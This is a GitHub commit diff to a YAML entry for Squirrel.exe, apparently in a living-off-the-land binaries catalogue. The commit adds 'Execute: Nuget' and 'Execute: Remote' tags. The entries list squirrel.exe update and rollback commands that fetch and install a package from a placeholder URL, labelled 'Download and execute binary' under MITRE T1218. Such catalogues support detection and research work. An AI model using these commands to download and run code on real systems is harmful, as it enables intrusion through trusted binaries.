Update Squirrel.yml tags

Added Tags:
Execute Nuget
Execute Remote
This commit is contained in:
hegusung 2024-10-13 22:28:11 +02:00 committed by GitHub
parent 4df50e3e79
commit ae12e139df
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194

View File

@ -18,6 +18,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --update [url to package] - Command: squirrel.exe --update [url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary Usecase: Download and execute binary
@ -25,6 +28,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --updateRollback=[url to package] - Command: squirrel.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary Usecase: Download and execute binary
@ -32,6 +38,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
- Command: squirrel.exe --updateRollback=[url to package] - Command: squirrel.exe --updateRollback=[url to package]
Description: The above binary will go to url and look for RELEASES file, download and install the nuget package. Description: The above binary will go to url and look for RELEASES file, download and install the nuget package.
Usecase: Download and execute binary Usecase: Download and execute binary
@ -39,6 +48,9 @@ Commands:
Privileges: User Privileges: User
MitreID: T1218 MitreID: T1218
OperatingSystem: Windows 7 and up with Microsoft Teams installed OperatingSystem: Windows 7 and up with Microsoft Teams installed
Tags:
- Execute: Nuget
- Execute: Remote
Full_Path: Full_Path:
- Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\current\Squirrel.exe' - Path: 'C:\Users\<username>\AppData\Local\Microsoft\Teams\current\Squirrel.exe'
Code_Sample: Code_Sample: